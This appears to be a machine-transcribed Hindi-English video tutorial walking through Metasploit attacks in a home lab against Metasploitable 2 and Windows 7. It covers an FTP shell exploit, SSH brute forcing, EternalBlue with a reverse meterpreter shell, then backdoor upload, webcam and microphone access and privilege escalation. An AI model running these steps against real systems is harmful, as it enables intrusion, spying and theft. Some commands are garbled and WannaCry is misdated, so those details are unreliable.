Do you know that most of the people learn Metasploit tool by just copying the commands? So that's why वो लोग फेल होते हैं रियल लैब सिनेरियोज में। आज की इस वीडियो में मैं आपको वॉक थ्रू कराऊंगा विद कंप्लीट मेटास्प्लॉइटेबल अटैक फ्लो, जहां पे हम बेसिक चीजें देखेंगे, रिकॉनेसेंस देखेंगे, एक्सप्लोइटेशन देखेंगे एंड पोस्ट एक्सप्लोइटेशन जैसे कंसेप्ट को अंडरस्टैंड करेंगे एकदम प्रैक्टिकल वे में। सो यू नीड टू जस्ट क्वेश्चन आउट कि आपको कमांड्स को जस्ट कॉपी करना है और आपको प्रैक्टिकल मेटास्प्लॉइट के अटैक को अंडरस्टैंड करना है। So that's why if you want to learn the Metasploitable attack flow, then watch this video till the end. So मैं यहाँ पे Parrot OS में हूँ, आप यहाँ पे सेम वे में काली का भी यूज़ कर सकते हैं। एंड टर्मिनल को मैं यहाँ पे ओपन कर लूँगा। So यहाँ पे मैं चेक करूँगा Parrot OS का वर्जन LSB/release/a एंड यहाँ पे मैं Debian बेस ऑपरेटिंग सिस्टम यूज़ कर रहा हूँ, जहाँ पे Parrot सिक्योरिटी 6.4 ये वाला स्पेसिफिकली वर्जन मैं यहाँ पे यूज़ कर रहा हूँ। एंड इसकी रिलीज डेट एंड इसका कोड नेम सारी इन्फॉर्मेशन मुझे यहाँ पे शो हो रही है। एंड मेक श्योर आप यहाँ पे जो भी मशीन यूज़ करें उसका आप यहाँ पे लेटेस्ट वर्जन यूज़ करें जो कि मेटास्प्लॉइट फ्रेमवर्क को सपोर्ट करता हो। अपनी मशीन को हम यहाँ पे अपडेट कर लेंगे। नाउ अब हम यहाँ पे वेरीफाई करेंगे मेटास्प्लॉइट फ्रेमवर्क को। MSF console//version लाइक यू कैन सी दैट मैं यहाँ पे इसका लेटेस्ट वर्जन यूज़ कर रहा हूँ 6.4.71। अगर आपके सिस्टम में मेटास्प्लॉइट फ्रेमवर्क नहीं है देन आप सिंपली इसे इंस्टॉल कर सकते हैं। sudo apt install metasploit/framework/y। अब हम यहाँ पे पोस्ट ग्रे एसक्यूएल सर्विस को स्टार्ट करेंगे जो कि मेटास्प्लॉइट डेटाबेस को यूज़ करने में हमें हेल्प करेगा। सर्विस को एनेबल करने के लिए हमारी यहाँ पे कमांड है कि sudo systemctl start post grep sql एंड देन हम अपनी सर्विस को एनेबल कर लेंगे। sudo systemctl enable post grep sql। यहाँ पे जो हमारी सर्विस है वो एनेबल हो जाएगी। अब हम यहाँ पे चेक कर लेंगे कि ये सर्विस हमारे मेटास्प्लॉइट के डेटाबेस को इनिशियलाइज करी है नहीं। उसके लिए सिंपली कमांड आएगी MSF database initialize एंटर। हमें यहाँ पे परमिशंस का एरर आ रहा है, सो हम sudo su करके रूट में एंटर हो जाएंगे। यू कैन सी दैट मैं यहाँ पे रूट में एंटर हो चुका हूँ। अब हम यहाँ पे सेम कमांड का यूज़ करेंगे MSF database initialize। यू कैन सी दैट कि जो मेरा डेटाबेस है वो ऑलरेडी यहाँ पे स्टार्टेड आ रहा है एंड वो इनिशियलाइज हो चुका है। अब हम यहाँ पे इसका स्टेटस भी विजिबल कर लेंगे MSF database status। आप यहाँ पे देख सकते हैं कि जो इसका स्टेटस है वो यहाँ पे एक्टिव आ रहा है एंड उसका डेट एंड टाइम भी हमको शो हो रहा है। सो हमारा जो मेटास्प्लॉइट का डेटाबेस है वो यहाँ पे एक्टिव हो चुका है जो कि हमको फर्दर एडवांस लर्निंग में काम आएगा। नाउ अब हम लॉन्च करेंगे मेटास्प्लॉइट को एंड सम बेसिक उसके इंटरफेस के बारे में जानेंगे। उसके लिए यहाँ पे कमांड आएगी MSF console एंटर। मेक श्योर कि आपको रूट में एंटर करके फिर आपको मेटास्प्लॉइट को ओपन करना है। यहाँ पे जो मेरे मेटास्प्लॉइट का फ्रेमवर्क है वो ओपन हो जाएगा एंड यहाँ पे मैं MSF के अंदर आ चुका हूँ। अब मैं आपको इसकी कुछ बेसिक कमांड दिखाता हूँ जिससे आपको एक आइडिया मिलेगा कि ये फ्रेमवर्क काम कैसे करता है। हेल्प कमांड का यूज़ करेंगे एंड जितनी भी यहाँ पे अवेलेबल लिस्ट ऑफ कमांड्स होंगी वो सब आपको यहाँ पे शो हो जाएंगी। आप यहाँ पे देख सकते हैं एकदम वेल क्लासीफाइड मैनर में आपको सारी कमांड शो होगी, इवन दो उसका जो डिस्क्रिप्शन है वो भी यहाँ पे आपको शो हो जाएगा। नाउ अब हम यहाँ पे बैनर सर्च करेंगे एंड जो रैंडम बैनर्स हैं उनको आपको ये डिस्प्ले कर देगा। वर्जन यहाँ पे सर्च करेंगे, मेटास्प्लॉइट का फ्रेमवर्क जो वर्जन यूज़ करा है एंड इसका कंसोल जो वर्जन यूज़ करा है उसकी डिटेल्स आपको यहाँ पे मिल जाएंगी। तो इस तरह से इसकी कुछ बेसिक कमांड्स हैं। अब मैं यहाँ पे आपको इसकी कुछ मॉड्यूल्स की कमांड्स दिखाता हूँ। जैसे कि अगर आपको यहाँ पे एक्सप्लॉइट को सर्च करना हो देन आपको यहाँ पे सर्च करना है शो एक्सप्लॉइट्स एंड देन इसको क्लिक करना है। जितने भी यहाँ पे अवेलेबल एक्सप्लॉइट्स हैं इवन दो उनकी डेट्स वो सब आपको यहाँ पे शो हो जाएंगे। नाउ अब आपको यहाँ पे सर्च करना है शो ऑक्सिलरी। जितनी भी लिस्ट ऑफ ऑक्सिलरी मॉड्यूल्स हैं वो सब आपको यहाँ पे शो हो जाएंगे। देन आपको यहाँ पे सर्च करना है शो पेलोड्स। मेटास्प्लॉइट में जितने भी अवेलेबल पेलोड्स हैं वो सब आपको यहाँ पे शो हो जाएंगे, इवन दो ये सारे विंडोज़ के पेलोड्स हैं। सो आप यहाँ पे इनकी डिटेल देख सकते हैं। आप इस फ्रेमवर्क का यूज़ करके अपने खुद के पेलोड भी बना सकते हैं और इन बिल्ड पेलोड्स को भी आप यूज़ कर सकते हैं। इस कमांड से आपको सारी लिस्ट मिलेगी। अगर आप यहाँ पे शो ऑप्शंस टाइप करेंगे देन ये आपको यहाँ पे सारे ऑप्शन दिखाएगा फॉर करंट मॉड्यूल। ऑप्शंस यहाँ पे आपको दिख रहे हैं, उनके करंट सेटिंग्स दिख रही हैं, उनका पूरा डिस्क्रिप्शन दिख रहा है कि कौन सा मॉड्यूल का काम क्या है। सो ये कुछ बेसिक कमांड्स हैं जिनके बारे में आपको पता होना चाहिए जब आप मेटास्प्लॉइट फ्रेमवर्क को यूज़ करें। नाउ आई एम गोइंग टू टेल यू अबाउट द फर्स्ट एक्सप्लॉइट दैट यू विल मेक इन मेटास्प्लॉइट। सो फर्स्ट ऑफ ऑल हम एक एक्सप्लॉइट को सर्च करेंगे। आपको यहाँ पे वीडियो को पॉज करके इस कमांड को डालना है। इस कमांड से जो हमारा एक्सप्लॉइट है हम उसे यूज़ करेंगे। एंटर करने के बाद यू कैन सी हमारा जो एक्सप्लॉइट है वो यहाँ पे सिलेक्ट हो चुका है। अब हम यहाँ पे टाइप करेंगे शो ऑप्शंस
एंड जितने भी लिस्ट ऑफ ऑप्शंस होंगे इस एक्सप्लॉइट के साथ वो हमको यहाँ पे शो हो जाएंगे। लाइक यू कैन सी दैट यहाँ पे आर होस्ट एंड आर पोर्ट का ऑप्शन शो हो रहा है। सो हम यहाँ पे आर होस्ट को सिलेक्ट कर लेंगे, सेट आर होस्ट एंड हमारी विक्टिम मशीन का जो आईपी एड्रेस होगा 192.168.115.129। यू कैन सी दैट यहाँ पे मैं विक्टिम मशीन में मेटास्प्लॉइटेबल 2 फ्रेमवर्क का यूज़ कर रहा हूँ जो कि एक वल्नरेबल मशीन है। सो आपको यहाँ पे इसका आईपी एड्रेस दिख रहा होगा 192.168.115.129। सो इसी का आईपी मैं यूज़ कर रहा हूँ। सो हमने यहाँ पे विक्टिम मशीन का आईपी एड्रेस डाल दिया है। अब हम सिंपली इसे एंटर करेंगे। हमारा जो आर होस्ट है वो यहाँ पे सिलेक्ट हो चुका है। एक्सप्लॉइट पे क्लिक करेंगे एंड यू कैन सी दैट हमारे यहाँ पे सेशन फाउंड हो चुका है। यहाँ पे हमको मैसेज आ रहा है कमांड सेल सेशन 1 ओपनड एंड हमारी जो विक्टिम मशीन का आईपी एड्रेस हमको यहाँ पे शो हो रहा है। हम यहाँ पे कमांड्स डाल के अपनी विक्टिम मशीन को एक्सेस कर सकते हैं। लाइक मैंने यहाँ पे ls कमांड का यूज़ किया है एंड विक्टिम मशीन में जितने भी यहाँ पे फोल्डर्स हैं वो सब यहाँ पे शो हो रहे हैं। मैं यहाँ पे pwd पे एंटर करूँगा। सो ये सारी कमांड्स मैं अपनी अटैकर मशीन से रन कर रहा हूँ एंड जो डेटा मुझे मिल रहा है, जो एक्सेस मुझे मिल रहा है वो सारा मुझे अपनी विक्टिम मशीन से मिल रहा है। तो इसी तरह हमने एक एक्सप्लॉइट मॉड्यूल को यहाँ पे सिलेक्ट किया, उसे फिर कन्फिगर किया एंड देन उसे कन्फिगर करने के बाद हमने एक वल्नरेबल FTP सर्विस को कॉम्प्रोमाइज़ किया जो कि मेटास्प्लॉइटेबल 2 लिनक्स की थी। अब हम यहाँ पे कुछ इंटरमीडिएट लेवल की चीज़ें देखेंगे, मींस रियल वर्ल्ड सिनेरियोस पे अब यहाँ पे हम काम करेंगे बिकॉज हमने सारी बेसिक लेवल की चीज़ें यहाँ पे अंडरस्टैंड कर ली। फर्स्ट ऑफ ऑल जो MSF कंसोल का डेटाबेस का यूज़ है उसे हम यहाँ पे देख लेंगे। सिंपली यहाँ पे कमांड आएगी MSF console/q एंटर। यू कैन सी दैट हम यहाँ पे डेटाबेस के अंदर एक्सेस कर चुके हैं जो कि MSF कंसोल के अंदर है। अब यहाँ पे कुछ डेटाबेस की कॉमन कमांड्स आती हैं लाइक database/status। यहाँ से हमको डेटाबेस का जो स्टेटस है कि वो किससे कनेक्ट हुआ है, MSF से कनेक्ट हुआ है एंड उसका कनेक्शन टाइप कौन सा है, ये वाला इसका कनेक्शन टाइप है। तभी हमने स्टार्टिंग में से एनेबल किया था ताकि हम डेटाबेस के अंदर एक्सेस ले सके। एंड नाउ आप यहाँ पे वर्क स्पेस भी अपनी देख सकते हैं, वर्क स्पेस एंटर। आप यहाँ पे डिफॉल्ट लेवल पे भी काम कर सकते हैं और अपनी खुद की एक वर्क स्पेस भी आप यहाँ पे क्रिएट कर सकते हैं, जैसे कि मैंने यहाँ पे क्रिएट किया। वर्क स्पेस को क्रिएट करने के लिए सिंपली यहाँ पे कमांड आएगी workspace/a, वर्क स्पेस का नाम लाइक ABC। आप अपने अकॉर्डिंग वर्क स्पेस का नाम यहाँ पे दे सकते हैं, एंटर। आपकी यहाँ पे वर्क स्पेस क्रिएट हो जाएगी एंड यहाँ पे ऐड भी हो जाएगी। होस्ट आप यहाँ पे देख सकते हैं एंड सेम वे में सर्विसेज हम यहाँ पे देख सकते हैं। इन दोनों कमांड्स का यूज करके ये यहाँ पे लिस्ट आउट करेगा, डिस्कवरी करेगा होस्ट की एंड सर्विसेज की। नाउ अब हम यहाँ पे ऑक्सिलरी मॉड्यूल का यूज करके रियल वर्ल्ड सिनेरियोस पे काम करेंगे एंड सम रिकॉग्निसेंस डेटा कैप्चर करेंगे। उसके लिए यहाँ पे कमांड आएगी यूज auxiliary/scanner/port scan/TCP। ऑक्सिलरी के अंदर जो स्कैनर होता है एंड पोर्ट स्कैनर होता है वो TCP का पोर्ट स्कैनर। इसके अंदर यू कैन सी दैट हम यहाँ पे एंटर हो चुके हैं। शो ऑप्शंस, जितने भी यहाँ पे नंबर ऑफ ऑप्शंस हमको इसके अंदर अवेलेबल मिलते हैं वो सारे यहाँ पे हमको दिख जाएंगे। आर होस्ट के साथ हमको यहाँ पे पोर्ट्स का ऑप्शन मिलता है, थ्रेड्स का ऑप्शन मिलता है एंड टाइम आउट का ऑप्शन मिलता है। सिंपली हम यहाँ पे आर होस्ट को सिलेक्ट कर लेंगे, सेट आर होस्ट 192.168.154.129/24। हम यहाँ पे अपनी विक्टिम मशीन का आईपी एड्रेस डालेंगे और /24 करके जो उसका सबनेट मास्क है वो भी हम यहाँ पे एंटर कर देंगे। हमारा जो आर होस्ट है वो यहाँ पे सिलेक्ट हो चुका है। सेम वे में हम यहाँ पे पोर्ट भी सिलेक्ट कर लेंगे, सेट पोर्ट 12000। आप यहाँ पे अपने अकॉर्डिंग कितने भी पोर्ट यहाँ पे सिलेक्ट कर सकते हैं, 1 to 50, 1 to 100, 1 to 200। मैंने यहाँ पे डिफॉल्ट सभी पोर्ट्स यहाँ पे सिलेक्ट कर लिए। 1 to 1000 पोर्ट्स यहाँ पे सिलेक्ट हो चुके हैं। यू कैन सी दैट पोर्ट्स यहाँ पे सिलेक्ट हो चुके हैं। अब हम सिंपली रन कर देंगे एंड हमारी जो स्कैनिंग है वो यहाँ पे स्टार्ट हो जाएगी। यहाँ पे मैंने इस स्कैनिंग को स्टॉप कर दिया बिकॉज यहाँ पे बहुत ज़्यादा ये टाइम कंज्यूमिंग हो गया था, बट आप यहाँ पे अपने अकॉर्डिंग स्कैनिंग को टाइम दे सकते हैं और पोर्ट्स को यहाँ पे स्कैन कर सकते हैं। नाउ अब हम यहाँ पे सेम ऑक्सिलरी के अंदर SBM वर्जन की डिरेक्शन करेंगे, यूज auxiliary/scanner/smb/smb वर्जन, एंटर। एंड हम यहाँ पे smb/smb वर्जन के अंदर यहाँ पे एंटर हो चुके हैं। अब हम सिंपली सेट कर देंगे अपना आर होस्ट 192.168.154.128 एंड रन करेंगे। यू कैन सी दैट यहाँ पे जो ऑक्सिलरी मॉड्यूल की एग्जीक्यूशन है वो कंप्लीट हो चुकी है एंड हमको 100% यहाँ पे स्कैनिंग हो चुकी है 1 of 1 होस्ट की। जितने भी यहाँ पे नंबर ऑफ होस्ट हैं वो यहाँ पे हमको दिख चुके हैं। मेरी जो एक्चुअली विक्टिम मशीन है उसमें जितने भी नंबर ऑफ होस्ट हैं उनकी लिस्ट मुझे यहाँ पे मिल चुकी है। अब यहाँ पे सेम वे में हम SSH सिक्योर शेल लॉगिंग के अंदर ब्रूट फोर्स का यूज़ करेंगे, auxiliary/scanner/ssh/ssh login
SSH का यहाँ पे फुल फॉर्म होती है सिक्योर शेल लॉगिन, जिसे हम रिमोटली लॉगिन करते हैं। इसके अंदर हम यहाँ पे एंटर कर चुके हैं। अब हम यहाँ पे सेट कर देंगे अपने R होस्ट को 192.168.154. R होस्ट में जो हमारी विक्टिम मशीन का IP एड्रेस है वो यहाँ पे आ जाएगा, जो कि मैं Metasploitable 2 यहाँ पे यूज़ कर रहा हूँ। इसे यहाँ पे मैं एंटर करूँगा और मेरा जो R होस्ट है वो यहाँ पे सिलेक्ट हो जाएगा। अब मुझे अपनी मशीन का जो यूज़र नेम है वो यहाँ पे डालना है MSF एडमिन। मेरा यहाँ पे जो यूज़र नेम है मशीन का वो भी सिलेक्ट हो जाएगा। अब सिंपली यहाँ पे हम ब्रूट फोर्स अटैक को लॉन्च करेंगे एंड यहाँ पे एक वर्ड की होती है लाइक रॉक्यू करके, वो एक TXT फाइल होती है। सो उसके थ्रू यहाँ पे शेल की इन्फॉर्मेशन को गैदर करेगा लाइक ब्रूट फोर्सिंग। सो लेट्स डू दैट। यहाँ पे हम सेट कर देंगे अपनी पास की user/share/wordlist/rockyou.txt। मेरी जो यहाँ पे पास फाइल है मैंने उसका नाम डाल दिया है एंड उसके साथ जो उसकी लोकेशन है कि यूज़र के अंदर एक फ़ाइल है यहाँ पे शेयर, फिर वर्ड लिस्ट और रॉक्यू करके एक फ़ाइल है। सो इसके अंदर से उसको स्कैनिंग करनी है। ये सारी मैंने यहाँ पे इन्फॉर्मेशन डाल दी है। अब सिंपली यहाँ पे मैं रन करूँगा। रन करने के बाद यू कैन सी दैट जो ब्रूट फोर्स है वो यहाँ पे स्टार्ट हो चुका है। स्कैन यहाँ पे हो चुका है। 1-on-1 होस्ट का 100% कंप्लीट आ रहा है एंड जो हमारा ऑक्सिलरी मोड है उसकी जो एग्जीक्यूशन है वो भी यहाँ पे कंप्लीट हो चुकी है। इवन तो जो हम लिनक्स यूज़ कर रहे हैं उसकी यहाँ पे सारी इन्फॉर्मेशन आ रही है। जो ऑक्सिलरी के मॉड्यूल्स होते हैं वो हमको शेल के अंदर का जो एक्सेस है वो प्रोवाइड नहीं करते हैं। वो बेसिकली जो इन्फॉर्मेशन होती है वो गैदर कराते हैं। सो वही इन्फॉर्मेशन हमको यहाँ पे अवेलेबल है। नाउ अब हम यहाँ पे एक रियल वर्ल्ड सिनेरियो एक्सप्लोरेशन करेंगे विद मेटास्प्लॉइट। हम यहाँ पे विंडोज़ एक्सप्लॉइट को यूज़ करेंगे। उसके लिए यहाँ पे कमांड आएगी यूज़ exploit/windows/ms17/010/eternal blue। विंडोज 7 में यहाँ पे इटर्नल ब्लू नाम की एक वर्नेबिलिटी एग्जिस्ट करती है जो कि WannaCry रैंसमवेयर अटैक में एक्सप्लॉइट की गई थी 2015 के टाइम पे। सो इसी वर्नेबिलिटी का हम यहाँ पे यूज़ कर रहे हैं। इसी वर्नेबिलिटी को हम यहाँ पे एक्सप्लॉइट कर रहे हैं विंडोज़ की। हमारी ये वर्नेबिलिटी यहाँ पे, हमारी ये एक्सप्लॉइट यहाँ पे सिलेक्ट हो चुका है। अब हम यहाँ पे सेट कर देंगे अपना पेलोड। सेट पेलोड windows/x64bit/meterpredator/reverse/tcp एंटर। हमारा जो यहाँ पे पेलोड है वो भी सिलेक्ट हो चुका है। अब हम कन्फिगर करेंगे अपने ऑप्शंस को। लाइक अब हम यहाँ पे सेट करेंगे R होस्ट को। R होस्ट में जो मेरी विंडोज़ का IP एड्रेस है वो मैं यहाँ पे डाल दूंगा। मैं यहाँ पे बैकग्राउंड में विंडोज 7 यूज़ कर रहा हूँ ताकि मैं आपको इसकी एक्सप्लोरेशन यहाँ पे दिखा सकूँ। सो इसका मैंने यहाँ पे R होस्ट सेलेक्ट कर लिया। नाउ अब हम यहाँ पे सेट करेंगे L होस्ट को, जो कि हमारी अटैकर मशीन का IP एड्रेस होगा 192.168.194.128 एंटर। एंड अब हम यहाँ पे सेट कर देंगे जो डिफॉल्ट यहाँ पे L पोर्ट होता है 444 and 4 एक्सप्लॉइट एंड देन एंटर। यू कैन सी दैट हमारी जो एक्सप्लोरेशन है वो यहाँ पे स्टार्ट हो गई है एंड हमारी जो विंडोज मशीन है उसमें ये वर्नेबिलिटी फाउंड हो चुकी है। एंड यू कैन सी दैट यहाँ पे मेटास्प्लॉइट 1 विंडोज के अंदर जो हमें एक्सेस है वो मिल चुका है। हम यहाँ पे मीटरप्रिडेटर सेशन के अंदर है। अब हम यहाँ पे कुछ कमांड्स देख सकते हैं लाइक हेल्प कमांड यहाँ पे मैं एंटर करूंगा एंड जितनी भी इसमें लिस्ट ऑफ अवेलेबल कमांड्स है वो हमको यहाँ पे विजिबल हो जाएगी। लाइक हम अपनी विंडोज मशीन का जो माइक है उसे रिकॉर्ड कर सकते हैं, उसका वेबकैम यहाँ पे हम देख सकते हैं, वेबकैम को एक्सेस कर सकते हैं, सभी चीजें हमको यहाँ पे मिल जाएंगी। सिस्टम इन्फो एंड जो हमारी वनरेबल मशीन है उसकी हमें सारी डिटेल्स यहाँ पे मिल रही हैं। लाइक यहाँ पे मैं विक्टिम PC यूज कर रहा हूँ, कंप्यूटर का नाम विंडोज 7, आर्किटेक्चर उसका कितने बिट का है, हर एक डिटेल हमको यहाँ पे मिल रही है। गेट UID जो उसका सर्वर का यूजर नेम है वो भी हमें यहाँ पे मिल रहा है। अथॉरिटी सिस्टम के अंदर हमने यहाँ पे एक्सेस लिया है। अब हम यहाँ पे शेल कमांड का यूज करेंगे जिससे हम सिस्टम के शेल में एंटर करेंगे। यू कैन सी दैट यहाँ पे मैं सिस्टम के शेल के अंदर एंटर कर चुका हूँ एंड यहाँ पे अब मैं आपको पोस्ट एक्सप्लोरेशन के सम बेसिक चीजें आपको यहाँ पे दिखा सकता हूँ। CD करके जो इसकी C ड्राइव है वहाँ पे मैं एंटर हो जाऊँगा / एंटर। यू कैन सी दैट यहाँ पे मैं C ड्राइव में भी इसके एंटर हो चुका हूँ एंड यहाँ से भी मैं इसके डेटा को एक्सेस कर सकता हूँ। लाइक अगर मुझे कोई भी फाइल डाउनलोड करनी है C ड्राइव से और एनी ड्राइव से, देन सिंपली मैं यहाँ पे लिखूँगा डाउनलोड एंड आगे अपनी फाइल का नाम। लाइक आप यहाँ पे अपनी कोई भी फाइल का नाम देख सकते हैं। मेरी वो मशीन एकदम खाली है, सो दैट्स वाई यहाँ पे कोई भी वहाँ पे फाइल्स अवेलेबल नहीं है। और अगर आपको अपनी विक्टिम मशीन की C ड्राइव में कोई भी चीज़ अपलोड करनी है देन उसकी भी ये कमांड होती है अपलोड एंड यहाँ पे अपनी फाइल का नाम देख के आप वो चीज़ अपलोड कर सकते हैं। लाइक backdoor.exe फाइल और यहाँ पे आएगी virus.exe फाइल। देन ये फाइल सीधा आपकी विंडोज़ मशीन के अंदर वहाँ पे इंजेक्ट हो जाएगी। नाउ अब मैं आपको यहाँ पे सम सिस्टम्स कमांड्स भी दिखा देता हूँ। फर्स्ट कमांड इज PS। इस कमांड से यहाँ पे आप प्रोसेसेस की लिस्ट यहाँ पे चेकआउट कर सकते हो। लाइक मैं इसे एंटर करूँगा एंड मेरी विंडोज़ मशीन में जितने भी प्रोसेस वहाँ पे रन हो रहे होंगे
वो सारी सर्विसेज, वो सारी फाइल्स मुझे यहाँ पे एक्सेस हो जाएंगी, लाइक यू कैन सी दैट। एंड अगर आपको यहाँ पे माइग्रेट करना है किसी भी अनदर प्रोसेस में, देन वो भी आप यहाँ पे कर सकते हो, लाइक यू कैन सी दैट। मैंने यहाँ पे एक फाइल का नाम डाल दिया एंड जो माइग्रेशन है वो उसकी सक्सेसफुल यहाँ पे हो चुकी है। नाउ अगर आपको यहाँ पे प्रिविलेज एस्केलेशन को अटेम्प्ट करना है, देन उसके लिए भी यहाँ पे कमांड होती है गेट सिस्टम। इसे जब हम यहाँ पे एंटर करेंगे, देन हम यहाँ पे अटेम्प्ट कर सकते हैं प्रिविलेज एस्केलेशन को। प्रिविलेज एस्केलेशन का बेसिकली मतलब होता है कि हम अगर लो अथॉरिटी में हैं, देन वहाँ पे हम एडमिन के अंदर यहाँ पे एक्सेस ले सकते हैं। सो उसके अटेम्प्टेशन के लिए हम इस कमांड का यहाँ पे यूज करते हैं। नाउ अगर यहाँ पे आपको इन्फॉर्मेशन को गैदर करना है, विंडोज के अंदर इन्फॉर्मेशन गैदर करनी है, देन उसके लिए यहाँ पे कमांड आएगी रन post/windows/gather/logged/on/users। इस कमांड को आपको यहाँ पे एंटर करना होगा एंड यू कैन सी दैट यहाँ पे जितने भी करंट लॉग्ड यूजर्स हैं उन सब की डिटेल्स आपको यहाँ पे मिल रही है। लाइक उनका जो SID नंबर होता है, यूज़र होता है कि कौन सा यूज़र यहाँ पे अवेलेबल है। यहाँ पे एक ही यूज़र अवेलेबल है, विक्टिम PC, एंड ये जो सारा रिजल्ट है वो यहाँ पे सेव हो रहा है इस लोकेशन के अंदर। सो इन कमांड्स का यूज़ करके आप यहाँ पे बहुत सारा रिकॉग्निशंस गैदर कर सकते हो। जितने भी यहाँ पे SID नंबर्स हैं, प्रोफाइल पाथ्स हैं, वो सारे यहाँ पे हमको विजिबल हो रहे हैं। सो यू कैन सी दैट कि हमने यहाँ पे अपनी विक्टिम विंडो मशीन को एक ही वल्नरेबिलिटी से पूरी तरह यहाँ पे एक्सप्लॉइट कर दिया, पूरी तरह यहाँ पे उसके सिस्टम में एक्सेस लिया एंड सभी फाइल्स को यहाँ पे चेक किया, सभी चीज़ों को हमने यहाँ पे चेक किया। अब यहाँ पे आपने बेसिक टू इंटरमीडिएट लेवल सब चीज़ें समझ ली हैं। अब नेक्स्ट वीडियो में हम यहाँ पे एडवांस कंसेप्ट्स एंड एडवांस टेक्निक्स पे बात करेंगे जो कि आपको हेल्प करेंगी एक प्रो एथिकल हैकर बनने में। सो फॉर दैट कंटेंट सब्सक्राइब टू CWE। थैंक यू।